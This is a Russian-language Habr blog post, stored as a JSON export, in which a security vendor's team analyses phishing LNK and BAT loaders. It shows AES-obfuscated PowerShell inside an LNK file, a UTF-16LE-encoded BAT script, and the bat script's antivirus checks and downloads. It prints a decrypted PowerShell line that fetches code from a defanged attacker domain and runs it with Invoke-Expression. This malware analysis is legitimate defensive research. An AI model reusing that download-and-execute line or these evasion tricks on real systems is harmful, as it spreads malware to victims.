{"id":465558,"date":"2025-07-01T21:00:15","date_gmt":"2025-07-01T21:00:15","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=465558"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=465558","title":{"rendered":"LNK- \u0438 BAT-\u0444\u0430\u0439\u043b\u044b: \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430<\/span>"},"content":{"rendered":"
<\/div>\n
\n
\n
\n
\n
<\/figure>\n

\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u041d\u0430 \u0441\u0432\u044f\u0437\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u00a0UserGate uFactor<\/strong> \u0438 \u044f \u2014 \u0435\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u0421\u0442\u0435\u043f\u0430\u043d \u041f\u0430\u043d\u0444\u0438\u043b\u043e\u0432<\/strong>. <\/p>\n

\u041c\u044b \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0446\u0435\u043b\u0443\u044e \u0441\u0435\u0440\u0438\u044e \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u043e\u0432, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044e \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. <\/p>\n

\u0414\u0430, \u043c\u044b \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c NGFW, \u043d\u043e \u0438, \u043a\u0430\u043a \u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0418\u0411-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u0433\u0440\u043e\u0437\u044b. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u0432\u0430 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u043e\u0433\u043e. \u041f\u0435\u0440\u0432\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u2014 \u0430\u0442\u0430\u043a\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 LNK-\u0444\u0430\u0439\u043b\u043e\u0432, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b, \u0432\u0442\u043e\u0440\u043e\u0439 \u2014 \u0430\u0442\u0430\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 BAT-\u0444\u0430\u0439\u043b\u044b. <\/p>\n

\u041e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 \u0432 \u043e\u0431\u043e\u0438\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u0445 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430. \u0424\u0430\u0439\u043b\u044b, \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043a \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u0430\u043c, \u043e\u0431\u044b\u0447\u043d\u043e \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u043d\u044b \u0432 ZIP-\u0430\u0440\u0445\u0438\u0432. \u0418\u043d\u043e\u0433\u0434\u0430 \u0430\u0440\u0445\u0438\u0432\u044b \u0437\u0430\u0449\u0438\u0449\u0430\u044e\u0442 \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0421\u0417\u0418, \u0441\u0430\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f. <\/p>\n

\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 1: \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f \u0432 LNK-\u0444\u0430\u0439\u043b\u0435<\/strong><\/p>\n

\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u043e\u0433\u043e \u0437\u0432\u0435\u043d\u0430 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043c\u043e\u0434\u0443\u043b\u044f \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u044b \u0444\u0430\u0439\u043b\u044b MS-SHLLINK. \u0414\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0432 LNK-\u0444\u0430\u0439\u043b\u0430\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0435 \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u044b CMD \u0438\u043b\u0438 PowerShell, \u043d\u043e \u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u0442\u044c \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b. \u041a \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044e \u0437\u0430\u0447\u0430\u0441\u0442\u0443\u044e \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u0438\u043b\u0438 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u0435\u0442 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u0433\u0440\u043e\u0437\u044b \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.<\/p>\n

\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e LNK-\u0444\u0430\u0439\u043b\u0430 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f.<\/p>\n

\u0414\u043b\u044f \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e LNK-\u0444\u0430\u0439\u043b\u043e\u0432 \u043c\u043e\u0436\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f hex-\u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u043e\u043c, \u0443\u0442\u0438\u043b\u0438\u0442\u0430\u043c\u0438 xxd \u0438\u043b\u0438 cat \u0432 UNIX-\u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0421\u0442\u043e\u0438\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 hex-\u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0442\u044c \u043d\u0435 \u0441\u0430\u043c LNK-\u0444\u0430\u0439\u043b, \u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0441\u044b\u043b\u0430\u0435\u0442\u0441\u044f \u044f\u0440\u043b\u044b\u043a, \u2014 \u0431\u0443\u0434\u044c\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u044b.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 LNK-\u0444\u0430\u0439\u043b\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439<\/em><\/figcaption><\/div>\n<\/figure>\n
\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 2. \u041f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 LNK-\u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u044b cat<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0421\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0438 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043c \u0435\u0433\u043e \u0432 \u0431\u043e\u043b\u0435\u0435 \u0443\u0434\u043e\u0431\u043d\u044b\u0439 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0432\u0438\u0434.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439, \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u043d\u044b\u0439 \u0438\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e LNK-\u0444\u0430\u0439\u043b\u0430<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 3 \u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044e \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0434\u0432\u0430 \u0441\u0442\u0440\u043e\u043a\u043e\u0432\u044b\u0445 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430 \u00aba\u00bb \u0438 \u00abb\u00bb, \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 base64. \u0410\u0440\u0433\u0443\u043c\u0435\u043d\u0442 \u00aba\u00bb \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u043c, \u0430 \u00abb\u00bb \u2014 \u043a\u043b\u044e\u0447\u043e\u043c \u0434\u043b\u044f \u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438. \u0422\u0430\u043a\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u043e\u0431\u044a\u0435\u043a\u0442 System.Security<\/a>.Cryptography.AesManaged, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u0443\u044e \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0441\u0438\u043c\u043c\u0435\u0442\u0440\u0438\u0447\u043d\u043e\u0433\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f AES. \u0410\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u044b \u00aba\u00bb \u0438 \u00abb\u00bb \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u00ab$a\u00bb \u0438 \u00ab$b\u00bb \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.<\/p>\n

\u0414\u043b\u044f \u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f PowerShell. \u041d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 Invoke-Expression $h \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u043b\u0441\u044f.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 4. \u0420\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0430 \u0441\u0442\u0440\u043e\u043a\u0438 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0430 \u00aba\u00bb<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 4 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439: $script = Invoke-WebRequest -Uri ‘https:\/\/emptyservices[.]xyz\/public\/904e5c82a258472395094ca10082fdfb.txt<\/a>‘ -UseBasicParsing; Invoke-Expression $script.Content \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 904e5c82a258472395094ca10082fdfb.txt \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0435 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0444\u0430\u0439\u043b.<\/p>\n

\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 PowerShell, \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 Invoke-Expression $script.Content \u043d\u0430 echo $script.Content, \u0438\u043b\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0443 curl \u0438\u043b\u0438 \u0441\u043a\u0430\u0447\u0430\u0432 \u0447\u0435\u0440\u0435\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440. \u041d\u043e, \u043a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0431\u044b\u043b\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430.<\/p>\n

\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f $KEYIV (\u0441\u043c. \u0440\u0438\u0441. 3), \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u043b\u044e\u0447\u043e\u043c \u0434\u043b\u044f \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0432 \u0444\u0430\u0439\u043b\u0435 904e5c82a258472395094ca10082fdfb.txt.<\/p>\n

\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 2: BAT-\u0444\u0430\u0439\u043b \u0438 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f Kramer \u0432 Python Malware<\/strong><\/p>\n

\u0422\u0435\u043f\u0435\u0440\u044c \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439.<\/p>\n

\u0417\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u043e\u043c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 BAT-\u0444\u0430\u0439\u043b. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u043a \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044e \u0432 BAT-\u0444\u0430\u0439\u043b\u0435 \u0441\u043b\u043e\u0436\u043d\u0443\u044e \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044e, \u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043c\u0435\u043d\u044f\u044e\u0442 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 \u0442\u0435\u043a\u0441\u0442\u0430. \u041f\u0440\u0438 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 Notepad, \u0443\u0432\u0438\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u0430\u0440\u0442\u0438\u043d\u0443.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0438\u0442\u0430\u0435\u043c\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u043c CyberChef<\/a> \u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u043e\u043c Text_Encoding_Brute_Force. <\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 UTF-16LE (1200) \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 CyberChef<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0421\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0432 \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u0439 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 \u0438 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043c \u043a\u043e\u0434 \u0432 \u0447\u0438\u0442\u0430\u0435\u043c\u044b\u0439 \u0432\u0438\u0434.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 7. \u041a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430 (\u043d\u0430\u0447\u0430\u043b\u043e)<\/em><\/figcaption><\/div>\n<\/figure>\n
\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 8. \u041a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e BAT-\u0444\u0430\u0439\u043b\u0430 (\u043e\u043a\u043e\u043d\u0447\u0430\u043d\u0438\u0435)<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041a\u0430\u043a \u0432\u0438\u0434\u0438\u043c, \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u0440\u043e\u0441\u0442:<\/p>\n

1.\u00a0\u041f\u043e\u043f\u044b\u0442\u043a\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u043b\u044e\u0431\u043e\u0439 PDF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 %USERPROFILE%\\Downloads \u2014 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043e\u0442\u0432\u043b\u0435\u043a\u0430\u044e\u0449\u0435\u0433\u043e \u043c\u0430\u043d\u0435\u0432\u0440\u0430. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u0430\u043c \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u0441\u0430\u043c \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438, \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438, \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 BAT-\u0444\u0430\u0439\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 PDF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442.<\/p>\n

2.\u00a0\u041f\u043e\u0438\u0441\u043a \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c.<\/p>\n

3.\u00a0\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430.<\/p>\n

4.\u00a0\u0420\u0430\u0437\u0430\u0440\u0445\u0438\u0432\u0430\u0446\u0438\u044f \u0438 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435.<\/p>\n

